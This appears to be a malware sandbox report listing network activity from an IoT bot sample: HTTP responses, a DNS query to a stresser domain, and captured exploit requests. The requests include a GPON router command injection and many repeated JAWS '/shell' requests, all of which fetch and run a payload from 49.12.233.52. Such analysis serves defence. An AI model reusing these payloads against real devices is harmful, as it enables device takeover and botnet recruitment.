Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Nov 2021 09:09:59 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundCONNECTION: closeCONTENT-LENGTH: 48X-XSS-Protection: 1;mode=blockContent-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'X-Content-Type-Options: nosniffCONTENT-TYPE: text/htmlData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><body><h1>404 Not Found</h1></body></html>

Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://49.12.233.52/bin
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9o6Z1wEokT, 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 9o6Z1wEokT	String found in binary or memory: http://upx.sf.net

Source: unknown

HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 39 2e 31 32 2e 32 33 33 2e 35 32 2f 62 69 6e 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://49.12.233.52/bin+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

Source: unknown

DNS traffic detected: queries for: scamanje.stresserit.pro

Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
